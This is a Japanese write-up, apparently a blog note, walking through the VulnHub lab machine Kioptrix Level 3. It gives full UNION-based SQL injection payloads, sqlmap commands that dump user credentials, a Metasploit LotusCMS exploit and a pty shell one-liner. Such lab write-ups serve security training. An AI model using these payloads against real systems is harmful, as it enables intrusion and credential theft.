【VulnHub】Kioptrix: Level3
参考文献
参考文献に以下を使用させていただきました
まとめ(途中)
簡易ルート
etc/hostsにホストを追加
nikto, dirbで/gallary/, /phpmyadmin/の存在を確認
index.phpにBlog, Loginページの存在を確認
Blogページの投稿されている記事を確認
LoginページにてCMSがLotusCMSであることを確認
phpmyadminのページでadmin/""でログインできることを確認
phpmyadminのログイン後、一部テーブルがみれることを確認
gallaryページに遷移し、webサイトの存在を確認
A.直接SQLインジェクション
gallary,phpページで?id=1を入れることで、エラー表示することを確認
gallary,phpページで?id=""を入れることで、上記エラーが解消されることを確認
.php?id=-1 union select 1,2,3,4,5,6--を入れることで、ページに2が表示されていることを確認
2をversion(). database(), user()などに変化させ、出力が変わることを確認
下記クエリを実行し、データベースにあるテーブルとその名前を列挙
.php?id=-1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--
下記クエリを実行し、dev_accountsのデータを列挙
.php?id=-1 union select 1,group_concat(column_name),3,4,5,6 FROM information_schema.columns WHERE table_name=CHAR(100, 101, 118, 95, 97, 99, 99, 111, 117, 110, 116, 115)--
下記クエリを実行し、ユーザ名、PWを列挙
.php?id=-1 union select 1,group_concat(username、0x3a、password),3,4,5,6 FROM dev_accounts--
B.sqlmapを使ったクラック
以下コマンドにて、dbを列挙
root@kali:~#sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dbs
以下コマンドにて、galleryDBのテーブルを列挙
root@kali:~#sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id --tables -D gallery
以下コマンドにて、ユーザ名及びPWを列挙
root @ kali:〜#sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id -T dev_accounts --dump
C,LotusCMSへのExploit
msfを用いて、exploit/multi/http/lcms_php_execを実行してmetapreter立ち上げ
shellおよびpythonでインタラクティブなshellを立ち上げ
python -c "import pty;pty.spawn('/bin/bash')"
ディレクトリの探索を行い、gconfig.phpにphpmyadminのrootのクレデンシャル情報を確認
探索
侵入
流れについては記事にしました
詳細
権限昇格
詳細
その他